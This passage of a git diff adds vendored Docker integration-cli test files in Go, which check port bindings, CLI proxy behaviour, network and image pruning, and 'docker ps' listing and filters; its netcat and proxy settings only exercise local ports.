+	// Check docker ps o/p for last created container reports the exposed ports in the port bindings
+	expBndRegx1 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort1)
+	expBndRegx2 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort2)
+	out, _ = dockerCmd(c, "ps", "-n=1")
+	// Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort1) in docker ps output
+	c.Assert(expBndRegx1.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort1: %s", out, unpPort1))
+	// Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort2) in docker ps output
+	c.Assert(expBndRegx2.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort2: %s", out, unpPort2))
+
+	// Run the container specifying explicit port bindings for the exposed ports
+	offset := 10000
+	pFlag1 := fmt.Sprintf("%d:%d", offset+port1, port1)
+	pFlag2 := fmt.Sprintf("%d:%d", offset+port2, port2)
+	out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, expose1, expose2, "busybox", "sleep", "5")
+	id := strings.TrimSpace(out)
+
+	// Check docker ps o/p for last created container reports the specified port mappings
+	expBnd1 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port1, unpPort1)
+	expBnd2 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port2, unpPort2)
+	out, _ = dockerCmd(c, "ps", "-n=1")
+	// Cannot find expected port binding (expBnd1) in docker ps output
+	c.Assert(out, checker.Contains, expBnd1)
+	// Cannot find expected port binding (expBnd2) in docker ps output
+	c.Assert(out, checker.Contains, expBnd2)
+
+	// Remove container now otherwise it will interfere with next test
+	stopRemoveContainer(id, c)
+
+	// Run the container with explicit port bindings and no exposed ports
+	out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, "busybox", "sleep", "5")
+	id = strings.TrimSpace(out)
+
+	// Check docker ps o/p for last created container reports the specified port mappings
+	out, _ = dockerCmd(c, "ps", "-n=1")
+	// Cannot find expected port binding (expBnd1) in docker ps output
+	c.Assert(out, checker.Contains, expBnd1)
+	// Cannot find expected port binding (expBnd2) in docker ps output
+	c.Assert(out, checker.Contains, expBnd2)
+	// Remove container now otherwise it will interfere with next test
+	stopRemoveContainer(id, c)
+
+	// Run the container with one unpublished exposed port and one explicit port binding
+	dockerCmd(c, "run", "-d", expose1, "-p", pFlag2, "busybox", "sleep", "5")
+
+	// Check docker ps o/p for last created container reports the specified unpublished port and port mapping
+	out, _ = dockerCmd(c, "ps", "-n=1")
+	// Missing unpublished exposed ports (unpPort1) in docker ps output
+	c.Assert(out, checker.Contains, unpPort1)
+	// Missing port binding (expBnd2) in docker ps output
+	c.Assert(out, checker.Contains, expBnd2)
+}
+
+func (s *DockerSuite) TestPortHostBinding(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox",
+		"nc", "-l", "-p", "80")
+	firstID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", firstID, "80")
+
+	err := assertPortList(c, out, []string{"0.0.0.0:9876"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "run", "--net=host", "busybox",
+		"nc", "localhost", "9876")
+
+	dockerCmd(c, "rm", "-f", firstID)
+
+	out, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "9876")
+	// Port is still bound after the Container is removed
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+}
+
+func (s *DockerSuite) TestPortExposeHostBinding(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "-d", "-P", "--expose", "80", "busybox",
+		"nc", "-l", "-p", "80")
+	firstID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", firstID, "80")
+
+	_, exposedPort, err := net.SplitHostPort(out)
+	c.Assert(err, checker.IsNil, check.Commentf("out: %s", out))
+
+	dockerCmd(c, "run", "--net=host", "busybox",
+		"nc", "localhost", strings.TrimSpace(exposedPort))
+
+	dockerCmd(c, "rm", "-f", firstID)
+
+	out, _, err = dockerCmdWithError("run", "--net=host", "busybox",
+		"nc", "localhost", strings.TrimSpace(exposedPort))
+	// Port is still bound after the Container is removed
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+}
+
+func (s *DockerSuite) TestPortBindingOnSandbox(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "network", "create", "--internal", "-d", "bridge", "internal-net")
+	nr := getNetworkResource(c, "internal-net")
+	c.Assert(nr.Internal, checker.Equals, true)
+
+	dockerCmd(c, "run", "--net", "internal-net", "-d", "--name", "c1",
+		"-p", "8080:8080", "busybox", "nc", "-l", "-p", "8080")
+	c.Assert(waitRun("c1"), check.IsNil)
+
+	_, _, err := dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080")
+	c.Assert(err, check.NotNil,
+		check.Commentf("Port mapping on internal network is expected to fail"))
+
+	// Connect container to another normal bridge network
+	dockerCmd(c, "network", "create", "-d", "bridge", "foo-net")
+	dockerCmd(c, "network", "connect", "foo-net", "c1")
+
+	_, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080")
+	c.Assert(err, check.IsNil,
+		check.Commentf("Port mapping on the new network is expected to succeed"))
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
new file mode 100644
index 0000000000..1cf569b806
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
@@ -0,0 +1,53 @@
+package main
+
+import (
+	"net"
+	"os/exec"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://..
+
+	cmd := exec.Command(dockerBinary, "info")
+	cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999")
+
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil, check.Commentf("%v", out))
+
+}
+
+// Can't use localhost here since go has a special case to not use proxy if connecting to localhost
+// See https://golang.org/pkg/net/http/#ProxyFromEnvironment
+func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	// get the IP to use to connect since we can't use localhost
+	addrs, err := net.InterfaceAddrs()
+	c.Assert(err, checker.IsNil)
+	var ip string
+	for _, addr := range addrs {
+		sAddr := addr.String()
+		if !strings.Contains(sAddr, "127.0.0.1") {
+			addrArr := strings.Split(sAddr, "/")
+			ip = addrArr[0]
+			break
+		}
+	}
+
+	c.Assert(ip, checker.Not(checker.Equals), "")
+
+	err = s.d.Start("-H", "tcp://"+ip+":2375")
+	c.Assert(err, checker.IsNil)
+	cmd := exec.Command(dockerBinary, "info")
+	cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"}
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+	// Test with no_proxy
+	cmd.Env = append(cmd.Env, "NO_PROXY="+ip)
+	out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info"))
+	c.Assert(err, checker.IsNil, check.Commentf("%v", out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
new file mode 100644
index 0000000000..dabbc72081
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
@@ -0,0 +1,91 @@
+// +build !windows
+
+package main
+
+import (
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) {
+	_, err := d.Cmd("network", "prune", "--force")
+	c.Assert(err, checker.IsNil)
+	out, err := d.Cmd("network", "ls", "--format", "{{.Name}}")
+	c.Assert(err, checker.IsNil)
+	for _, s := range kept {
+		c.Assert(out, checker.Contains, s)
+	}
+	for _, s := range pruned {
+		c.Assert(out, checker.Not(checker.Contains), s)
+	}
+}
+
+func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	_, err := d.Cmd("network", "create", "n1") // used by container (testprune)
+	c.Assert(err, checker.IsNil)
+	_, err = d.Cmd("network", "create", "n2")
+	c.Assert(err, checker.IsNil)
+	_, err = d.Cmd("network", "create", "n3", "--driver", "overlay") // used by service (testprunesvc)
+	c.Assert(err, checker.IsNil)
+	_, err = d.Cmd("network", "create", "n4", "--driver", "overlay")
+	c.Assert(err, checker.IsNil)
+
+	cName := "testprune"
+	_, err = d.Cmd("run", "-d", "--name", cName, "--net", "n1", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	serviceName := "testprunesvc"
+	replicas := 1
+	out, err := d.Cmd("service", "create", "--name", serviceName,
+		"--replicas", strconv.Itoa(replicas),
+		"--network", "n3",
+		"busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, replicas+1)
+
+	// prune and verify
+	pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"})
+
+	// remove containers, then prune and verify again
+	_, err = d.Cmd("rm", "-f", cName)
+	c.Assert(err, checker.IsNil)
+	_, err = d.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil)
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
+	pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"})
+}
+
+func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+
+	out, _, err := s.d.buildImageWithOut("test",
+		`FROM busybox
+                 LABEL foo=bar`, true, "-q")
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+
+	out, err = s.d.Cmd("images", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id)
+
+	out, err = s.d.Cmd("image", "prune", "--force")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id)
+
+	out, err = s.d.Cmd("images", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id)
+
+	out, err = s.d.Cmd("image", "prune", "--force", "--all")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id)
+
+	out, err = s.d.Cmd("images", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
new file mode 100644
index 0000000000..19ede90d5a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
@@ -0,0 +1,952 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestPsListContainersBase(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	firstID := strings.TrimSpace(out)
+
+	out, _ = runSleepingContainer(c, "-d")
+	secondID := strings.TrimSpace(out)
+
+	// not long running
+	out, _ = dockerCmd(c, "run", "-d", "busybox", "true")
+	thirdID := strings.TrimSpace(out)
+
+	out, _ = runSleepingContainer(c, "-d")
+	fourthID := strings.TrimSpace(out)
+
+	// make sure the second is running
+	c.Assert(waitRun(secondID), checker.IsNil)
+
+	// make sure third one is not running
+	dockerCmd(c, "wait", thirdID)
+
+	// make sure the forth is running
+	c.Assert(waitRun(fourthID), checker.IsNil)
+
+	// all
+	out, _ = dockerCmd(c, "ps", "-a")
+	c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out))
+
+	// running
+	out, _ = dockerCmd(c, "ps")
+	c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out))
+
+	// limit
+	out, _ = dockerCmd(c, "ps", "-n=2", "-a")
+	expected := []string{fourthID, thirdID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-n=2")
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out))
+
+	// filter since
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a")
+	expected = []string{fourthID, thirdID, secondID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID)
+	expected = []string{fourthID, secondID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "since="+thirdID)
+	expected = []string{fourthID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+
+	// filter before
+	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a")
+	expected = []string{thirdID, secondID, firstID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID)
+	expected = []string{secondID, firstID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID)
+	expected = []string{secondID, firstID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+
+	// filter since & before
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a")
+	expected = []string{thirdID, secondID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID)
+	expected = []string{secondID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out))
+
+	// filter since & limit
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a")
+	expected = []string{fourthID, thirdID}
+
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2")
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+
+	// filter before & limit
+	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a")
+	expected = []string{thirdID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1")
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+
+	// filter since & filter before & limit
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a")
+	expected = []string{thirdID}
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+
+	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1")
+	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+
+}
+
+func assertContainerList(out string, expected []string) bool {
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+
+	if len(lines)-1 != len(expected) {
+		return false
+	}
+
+	containerIDIndex := strings.Index(lines[0], "CONTAINER ID")
+	for i := 0; i < len(expected); i++ {
+		foundID := lines[i+1][containerIDIndex : containerIDIndex+12]
+		if foundID != expected[i][:12] {
+			return false
+		}
+	}
+
+	return true
+}
+
+// FIXME(vdemeester) Move this into a unit test in daemon package
+func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) {
+	out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Invalid filter")
+}
+
+func (s *DockerSuite) TestPsListContainersSize(c *check.C) {
+	// Problematic on Windows as it doesn't report the size correctly @swernli
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "busybox")
+
+	baseOut, _ := dockerCmd(c, "ps", "-s", "-n=1")
+	baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n")
+	baseSizeIndex := strings.Index(baseLines[0], "SIZE")
+	baseFoundsize := baseLines[1][baseSizeIndex:]
+	baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0])
+	c.Assert(err, checker.IsNil)
+
+	name := "test_size"
+	dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test")
+	id, err := getIDByName(name)
+	c.Assert(err, checker.IsNil)
+
+	runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1")
+	var out string
+
+	wait := make(chan struct{})
+	go func() {
+		out, _, err = runCommandWithOutput(runCmd)
+		close(wait)
+	}()
+	select {
+	case <-wait:
+	case <-time.After(3 * time.Second):
+		c.Fatalf("Calling \"docker ps -s\" timed out!")
+	}
+	c.Assert(err, checker.IsNil)
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+	c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines)))
+	sizeIndex := strings.Index(lines[0], "SIZE")
+	idIndex := strings.Index(lines[0], "CONTAINER ID")
+	foundID := lines[1][idIndex : idIndex+12]
+	c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID))
+	expectedSize := fmt.Sprintf("%d B", (2 + baseBytes))
+	foundSize := lines[1][sizeIndex:]
+	c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize))
+}
+
+func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) {
+	// start exited container
+	out, _ := dockerCmd(c, "run", "-d", "busybox")
+	firstID := strings.TrimSpace(out)
+
+	// make sure the exited container is not running
+	dockerCmd(c, "wait", firstID)
+
+	// start running container
+	out, _ = dockerCmd(c, "run", "-itd", "busybox")
+	secondID := strings.TrimSpace(out)
+
+	// filter containers by exited
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited")
+	containerOut := strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, firstID)
+
+	out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, secondID)
+
+	result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Unrecognised filter value for status",
+	})
+
+	// Windows doesn't support pausing of containers
+	if daemonPlatform != "windows" {
+		// pause running container
+		out, _ = dockerCmd(c, "run", "-itd", "busybox")
+		pausedID := strings.TrimSpace(out)
+		dockerCmd(c, "pause", pausedID)
+		// make sure the container is unpaused to let the daemon stop it properly
+		defer func() { dockerCmd(c, "unpause", pausedID) }()
+
+		out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused")
+		containerOut = strings.TrimSpace(out)
+		c.Assert(containerOut, checker.Equals, pausedID)
+	}
+}
+
+func (s *DockerSuite) TestPsListContainersFilterHealth(c *check.C) {
+	// Test legacy no health check
+	out, _ := runSleepingContainer(c, "--name=none_legacy")
+	containerID := strings.TrimSpace(out)
+
+	waitForContainer(containerID)
+
+	out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none")
+	containerOut := strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out))
+
+	// Test no health check specified explicitly
+	out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck")
+	containerID = strings.TrimSpace(out)
+
+	waitForContainer(containerID)
+
+	out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out))
+
+	// Test failing health check
+	out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s")
+	containerID = strings.TrimSpace(out)
+
+	waitForHealthStatus(c, "failing_container", "starting", "unhealthy")
+
+	out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out))
+
+	// Check passing healthcheck
+	out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s")
+	containerID = strings.TrimSpace(out)
+
+	waitForHealthStatus(c, "passing_container", "starting", "healthy")
+
+	out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out))
+}
+
+func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) {
+	// start container
+	out, _ := dockerCmd(c, "run", "-d", "busybox")
+	firstID := strings.TrimSpace(out)
+
+	// start another container
+	runSleepingContainer(c)
+
+	// filter containers by id
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--filter=id="+firstID)
+	containerOut := strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, firstID[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID[:12], containerOut, out))
+}
+
+func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) {
+	// start container
+	dockerCmd(c, "run", "--name=a_name_to_match", "busybox")
+	id, err := getIDByName("a_name_to_match")
+	c.Assert(err, check.IsNil)
+
+	// start another container
+	runSleepingContainer(c, "--name=b_name_to_match")
+
+	// filter containers by name
+	out, _ := dockerCmd(c, "ps", "-a", "-q", "--filter=name=a_name_to_match")
+	containerOut := strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", id[:12], containerOut, out))
+}
+
+// Test for the ancestor filter for ps.
+// There is also the same test but with image:tag@digest in docker_cli_by_digest_test.go
+//
+// What the test setups :
+// - Create 2 image based on busybox using the same repository but different tags
+// - Create an image based on the previous image (images_ps_filter_test2)
+// - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2)
+// - Filter them out :P
+func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) {
+	// Build images
+	imageName1 := "images_ps_filter_test1"
+	imageID1, err := buildImage(imageName1,
+		`FROM busybox
+		 LABEL match me 1`, true)
+	c.Assert(err, checker.IsNil)
+
+	imageName1Tagged := "images_ps_filter_test1:tag"
+	imageID1Tagged, err := buildImage(imageName1Tagged,
+		`FROM busybox
+		 LABEL match me 1 tagged`, true)
+	c.Assert(err, checker.IsNil)
+
+	imageName2 := "images_ps_filter_test2"
+	imageID2, err := buildImage(imageName2,
+		fmt.Sprintf(`FROM %s
+		 LABEL match me 2`, imageName1), true)
+	c.Assert(err, checker.IsNil)
+
+	// start containers
+	dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello")
+	firstID, err := getIDByName("first")
+	c.Assert(err, check.IsNil)
+
+	// start another container
+	dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello")
+	secondID, err := getIDByName("second")
+	c.Assert(err, check.IsNil)
+
+	// start third container
+	dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello")
+	thirdID, err := getIDByName("third")
+	c.Assert(err, check.IsNil)
+
+	// start fourth container
+	dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello")
+	fourthID, err := getIDByName("fourth")
+	c.Assert(err, check.IsNil)
+
+	// start fifth container
+	dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello")
+	fifthID, err := getIDByName("fifth")
+	c.Assert(err, check.IsNil)
+
+	var filterTestSuite = []struct {
+		filterName  string
+		expectedIDs []string
+	}{
+		// non existent stuff
+		{"nonexistent", []string{}},
+		{"nonexistent:tag", []string{}},
+		// image
+		{"busybox", []string{firstID, secondID, thirdID, fourthID, fifthID}},
+		{imageName1, []string{thirdID, fifthID}},
+		{imageName2, []string{fifthID}},
+		// image:tag
+		{fmt.Sprintf("%s:latest", imageName1), []string{thirdID, fifthID}},
+		{imageName1Tagged, []string{fourthID}},
+		// short-id
+		{stringid.TruncateID(imageID1), []string{thirdID, fifthID}},
+		{stringid.TruncateID(imageID2), []string{fifthID}},
+		// full-id
+		{imageID1, []string{thirdID, fifthID}},
+		{imageID1Tagged, []string{fourthID}},
+		{imageID2, []string{fifthID}},
+	}
+
+	var out string
+	for _, filter := range filterTestSuite {
+		out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName)
+		checkPsAncestorFilterOutput(c, out, filter.filterName, filter.expectedIDs)
+	}
+
+	// Multiple ancestor filter
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged)
+	checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID})
+}
+
+func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) {
+	actualIDs := []string{}
+	if out != "" {
+		actualIDs = strings.Split(out[:len(out)-1], "\n")
+	}
+	sort.Strings(actualIDs)
+	sort.Strings(expectedIDs)
+
+	c.Assert(actualIDs, checker.HasLen, len(expectedIDs), check.Commentf("Expected filtered container(s) for %s ancestor filter to be %v:%v, got %v:%v", filterName, len(expectedIDs), expectedIDs, len(actualIDs), actualIDs))
+	if len(expectedIDs) > 0 {
+		same := true
+		for i := range expectedIDs {
+			if actualIDs[i] != expectedIDs[i] {
+				c.Logf("%s, %s", actualIDs[i], expectedIDs[i])
+				same = false
+				break
+			}
+		}
+		c.Assert(same, checker.Equals, true, check.Commentf("Expected filtered container(s) for %s ancestor filter to be %v, got %v", filterName, expectedIDs, actualIDs))
+	}
+}
+
+func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) {
+	// start container
+	dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox")
+	firstID, err := getIDByName("first")
+	c.Assert(err, check.IsNil)
+
+	// start another container
+	dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox")
+	secondID, err := getIDByName("second")
+	c.Assert(err, check.IsNil)
+
+	// start third container
+	dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox")
+	thirdID, err := getIDByName("third")
+	c.Assert(err, check.IsNil)
+
+	// filter containers by exact match
+	out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me")
+	containerOut := strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out))
+
+	// filter containers by two labels
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out))
+
+	// filter containers by two labels, but expect not found because of AND behavior
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag-no")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Equals, "", check.Commentf("Expected nothing, got %s for exited filter, output: %q", containerOut, out))
+
+	// filter containers by exact key
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match")
+	containerOut = strings.TrimSpace(out)
+	c.Assert(containerOut, checker.Contains, firstID)
